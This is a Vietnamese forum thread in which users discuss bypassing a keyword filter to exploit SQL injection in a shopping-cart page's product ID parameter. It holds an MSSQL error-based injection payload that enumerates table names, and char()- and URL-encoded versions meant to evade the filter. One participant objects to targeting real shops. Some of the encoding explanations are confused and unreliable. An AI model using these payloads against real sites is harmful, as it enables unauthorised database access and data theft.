Latest posts for the topic "Thâm nhập qua lỗi SQL Injection này được không?"

Thâm nhập qua lỗi SQL Injection này được không?

chatting2005 — GMT

Đây là link trang lỗi http://www.site.com/addCart.asp?v=1&pid=2148779' Sau khi thêm đủ kiểu and, or và union nó đều về trang chủ, chịu thua không biết tiếp tục thế nào. Vậy có thể thâm nhập trang trên thông qua lỗi injection này không? Cám ơn mọi người đã đọc :)

Re: Thâm nhập qua lỗi SQL Injection này được không?

gamma95 — GMT

nó filter keyword thôi

Re: Thâm nhập qua lỗi SQL Injection này được không?

chatting2005 — GMT

Mình thấy tấn công qua lỗi injection là nhờ vào các keyword, nó lọc các keyword thì tức là trang này mình không tấn công được phải không bạn :(

Re: Thâm nhập qua lỗi SQL Injection này được không?

conmale — GMT

chatting2005 wrote:

Mình thấy tấn công qua lỗi injection là nhờ vào các keyword, nó lọc các keyword thì tức là trang này mình không tấn công được phải không bạn :(

Thử tìm hiểu xem "nó" lọc các keyword ở mức độ nào? (gợi ý: lọc keyword ở dạng ASCII bình thường hay lọc cả ở dạng encoded luôn?). PS: Tôi tham gia chủ đề này với cái nhìn thuần túy kỹ thuật. Tôi không chấp nhận những exploit thật và dùng địa chỉ thật. Đặc biệt là các "shop" online. Bởi thế, tôi đề nghị sửa lại nội dung mang địa chỉ mang tính minh họa mà thôi.

Re: Thâm nhập qua lỗi SQL Injection này được không?

kimsonha — GMT

Thử tìm hiểu xem "nó" lọc các keyword ở mức độ nào? (gợi ý: lọc keyword ở dạng ASCII bình thường hay lọc cả ở dạng encoded luôn?).

Em chưa biết cách tìm hiểu cách "nó" lọc keyword như thế nào , nhưng theo gợi ý của bác conmale thì có hai cách :D (chắc có nhiều nhưng bác chỉ chỉ hai cach thương áp dụng nhỉ) .

lọc keyword ở dạng ASCII

Nếu là lọc sang ASCII thì chắc ta phải convert sang ASCII phải không ạ ? Sau đó đưa lên ngay url để query sao ? Ví dụ em có query :

and 1=convert(int,(select top 1 table_name from information_schema.tables))--

thì em phải chuyển sang ASCII là :

char(97)%2bchar(110)%2bchar(100)%2bchar(NULL)%2bchar(49)%2bchar(61)%2bchar(99)%2bchar(111)%2bchar(110)%2bchar(118)%2bchar(101)%2bchar(114)%2bchar(116)%2bchar(40)%2bchar(105)%2bchar(110)%2bchar(116)%2bchar(44)%2bchar(40)%2bchar(115)%2bchar(101)%2bchar(108)%2bchar(101)%2bchar(99)%2bchar(116)%2bchar(NULL)%2bchar(116)%2bchar(111)%2bchar(112)%2bchar(NULL)%2bchar(49)%2bchar(NULL)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(95)%2bchar(110)%2bchar(97)%2bchar(109)%2bchar(101)%2bchar(NULL)%2bchar(102)%2bchar(114)%2bchar(111)%2bchar(109)%2bchar(NULL)%2bchar(105)%2bchar(110)%2bchar(102)%2bchar(111)%2bchar(114)%2bchar(109)%2bchar(97)%2bchar(116)%2bchar(105)%2bchar(111)%2bchar(110)%2bchar(95)%2bchar(115)%2bchar(99)%2bchar(104)%2bchar(101)%2bchar(109)%2bchar(97)%2bchar(46)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(115)%2bchar(41)%2bchar(41)%2bchar(45)%2bchar(45)

Như vậy có đúng không ạ ?

Re: Thâm nhập qua lỗi SQL Injection này được không?

conmale — GMT

kimsonha wrote:

Thử tìm hiểu xem "nó" lọc các keyword ở mức độ nào? (gợi ý: lọc keyword ở dạng ASCII bình thường hay lọc cả ở dạng encoded luôn?).
Em chưa biết cách tìm hiểu cách "nó" lọc keyword như thế nào , nhưng theo gợi ý của bác conmale thì có hai cách :D (chắc có nhiều nhưng bác chỉ chỉ hai cach thương áp dụng nhỉ) .
lọc keyword ở dạng ASCII
Nếu là lọc sang ASCII thì chắc ta phải convert sang ASCII phải không ạ ? Sau đó đưa lên ngay url để query sao ? Ví dụ em có query :
and 1=convert(int,(select top 1 table_name from information_schema.tables))--
thì em phải chuyển sang ASCII là :
char(97)%2bchar(110)%2bchar(100)%2bchar(NULL)%2bchar(49)%2bchar(61)%2bchar(99)%2bchar(111)%2bchar(110)%2bchar(118)%2bchar(101)%2bchar(114)%2bchar(116)%2bchar(40)%2bchar(105)%2bchar(110)%2bchar(116)%2bchar(44)%2bchar(40)%2bchar(115)%2bchar(101)%2bchar(108)%2bchar(101)%2bchar(99)%2bchar(116)%2bchar(NULL)%2bchar(116)%2bchar(111)%2bchar(112)%2bchar(NULL)%2bchar(49)%2bchar(NULL)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(95)%2bchar(110)%2bchar(97)%2bchar(109)%2bchar(101)%2bchar(NULL)%2bchar(102)%2bchar(114)%2bchar(111)%2bchar(109)%2bchar(NULL)%2bchar(105)%2bchar(110)%2bchar(102)%2bchar(111)%2bchar(114)%2bchar(109)%2bchar(97)%2bchar(116)%2bchar(105)%2bchar(111)%2bchar(110)%2bchar(95)%2bchar(115)%2bchar(99)%2bchar(104)%2bchar(101)%2bchar(109)%2bchar(97)%2bchar(46)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(115)%2bchar(41)%2bchar(41)%2bchar(45)%2bchar(45)
Như vậy có đúng không ạ ?

Dòng trên là ASCII, dòng dưới là urlencoded (chớ không phải "chuyển sang ASCII"). Tùy bộ lọc ấy có lọc thuần túy ASCII hay lọc cả urlencoded format mà đi đến chỗ query có được hay không.

Re: Thâm nhập qua lỗi SQL Injection này được không?

kimsonha — GMT

Em vẫn chưa hiểu được ý của bác conmale,

Dòng trên là ASCII, dòng dưới là urlencoded (chớ không phải "chuyển sang ASCII").

Có một số trang khi query table đầu tiên thành công, nhưng khi query table tiếp theo thì mình cần chuyển sang ASCII thì mới query được . Như vậy thì phải gọi là chuyển sang ASCII đúng không ạ ? Theo như em nghĩ thì khi xử lí query thì nếu phát hiện thấy có từ and , or hay union thì sẽ loại bỏ truy vấn và đưa mình về trang chủ (cái này la đoán mò thôi, chứ em mới học lớp 11 à, kiến thức còn gà lắm) . Vậy nếu mình chuyển sang mã ASCII để query thì nó sẽ xử lí như sau:

kiếm tra xem trong query có các kí tự không cho phép hay không? Không => cho qua

sau đó nó gặp char() và nó chuyển các char() đó sang kí tự như ta vấn thấy

bây giờ nó xử lí truy vấn, và lúc này nó sẽ không kiểm tra các kí tự không cho phép nên ta sẽ lọt được qua khỏi bộ lọc đó

Không biết như vậy có đúng không ạ ? Em vấn chưa hiểu cái này:

dòng dưới là urlencoded

Bác làm ơn nói rõ hơn được không ?

Re: Thâm nhập qua lỗi SQL Injection này được không?

conmale — GMT

Sao không tự tìm thử "urlencode" là cái gì? Bồ thực thi cái query đó bằng phương tiện nào (xuyên qua SQL client, trình duyệt, netcat....)?

Re: Thâm nhập qua lỗi SQL Injection này được không?

kimsonha — GMT

A em hiểu "urlencode" là gì rồi. em thực thi query qua trình duyệt nên gọi là urlencode đúng không ạ ? Đây là lần đầu tiên em nghe thây hack SQL qua netcat, vậy ta có thể khai thác qua netcat như thế nào vậy bác ?

Re: Thâm nhập qua lỗi SQL Injection này được không?

mR.Bi — GMT

Code:

char(97)%2bchar(110)%2bchar(100)%2bchar(NULL)%2bchar(49)%2bchar(61)%2bchar(99)%2bchar(111)%2bchar(110)%2bchar(118)%2bchar(101)%2bchar(114)%2bchar(116)%2bchar(40)%2bchar(105)%2bchar(110)%2bchar(116)%2bchar(44)%2bchar(40)%2bchar(115)%2bchar(101)%2bchar(108)%2bchar(101)%2bchar(99)%2bchar(116)%2bchar(NULL)%2bchar(116)%2bchar(111)%2bchar(112)%2bchar(NULL)%2bchar(49)%2bchar(NULL)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(95)%2bchar(110)%2bchar(97)%2bchar(109)%2bchar(101)%2bchar(NULL)%2bchar(102)%2bchar(114)%2bchar(111)%2bchar(109)%2bchar(NULL)%2bchar(105)%2bchar(110)%2bchar(102)%2bchar(111)%2bchar(114)%2bchar(109)%2bchar(97)%2bchar(116)%2bchar(105)%2bchar(111)%2bchar(110)%2bchar(95)%2bchar(115)%2bchar(99)%2bchar(104)%2bchar(101)%2bchar(109)%2bchar(97)%2bchar(46)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(115)%2bchar(41)%2bchar(41)%2bchar(45)%2bchar(45)

Dòng này là urlencode, nhưng nghe nói urlencode dùng bảng mã ASCII (gồm số và chữ), các kí tự -_.!~*'(), và "+" , "%", khoảng trắng đc chuyển thành "+" thì phải. Vậy nếu bạn có Code:

char(97)%2bchar(110)%2bchar(100)%2bchar(NULL)%2bchar(49)%2bchar(61)%2bchar(99)%2bchar(111)%2bchar(110)%2bchar(118)%2bchar(101)%2bchar(114)%2bchar(116)%2bchar(40)%2bchar(105)%2bchar(110)%2bchar(116)%2bchar(44)%2bchar(40)%2bchar(115)%2bchar(101)%2bchar(108)%2bchar(101)%2bchar(99)%2bchar(116)%2bchar(NULL)%2bchar(116)%2bchar(111)%2bchar(112)%2bchar(NULL)%2bchar(49)%2bchar(NULL)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(95)%2bchar(110)%2bchar(97)%2bchar(109)%2bchar(101)%2bchar(NULL)%2bchar(102)%2bchar(114)%2bchar(111)%2bchar(109)%2bchar(NULL)%2bchar(105)%2bchar(110)%2bchar(102)%2bchar(111)%2bchar(114)%2bchar(109)%2bchar(97)%2bchar(116)%2bchar(105)%2bchar(111)%2bchar(110)%2bchar(95)%2bchar(115)%2bchar(99)%2bchar(104)%2bchar(101)%2bchar(109)%2bchar(97)%2bchar(46)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(115)%2bchar(41)%2bchar(41)%2bchar(45)%2bchar(45)

thì decode sẽ ra Code:

char(97)+char(110)+char(100)+char(NULL)+char(49)+char(61)+char(99)+char(111)+char(110)+char(118)+char(101)+char(114)+char(116)+char(40)+char(105)+char(110)+char(116)+char(44)+char(40)+char(115)+char(101)+char(108)+char(101)+char(99)+char(116)+char(NULL)+char(116)+char(111)+char(112)+char(NULL)+char(49)+char(NULL)+char(116)+char(97)+char(98)+char(108)+char(101)+char(95)+char(110)+char(97)+char(109)+char(101)+char(NULL)+char(102)+char(114)+char(111)+char(109)+char(NULL)+char(105)+char(110)+char(102)+char(111)+char(114)+char(109)+char(97)+char(116)+char(105)+char(111)+char(110)+char(95)+char(115)+char(99)+char(104)+char(101)+char(109)+char(97)+char(46)+char(116)+char(97)+char(98)+char(108)+char(101)+char(115)+char(41)+char(41)+char(45)+char(45)

vẫn còn dấu cộng:) nên decode lần nữa, "+" thành khoảng trắng Code:

char(97) char(110) char(100) char(NULL) char(49) char(61) char(99) char(111) char(110) char(118) char(101) char(114) char(116) char(40) char(105) char(110) char(116) char(44) char(40) char(115) char(101) char(108) char(101) char(99) char(116) char(NULL) char(116) char(111) char(112) char(NULL) char(49) char(NULL) char(116) char(97) char(98) char(108) char(101) char(95) char(110) char(97) char(109) char(101) char(NULL) char(102) char(114) char(111) char(109) char(NULL) char(105) char(110) char(102) char(111) char(114) char(109) char(97) char(116) char(105) char(111) char(110) char(95) char(115) char(99) char(104) char(101) char(109) char(97) char(46) char(116) char(97) char(98) char(108) char(101) char(115) char(41) char(41) char(45) char(45)

Mò, nên %đúng là rất ít :)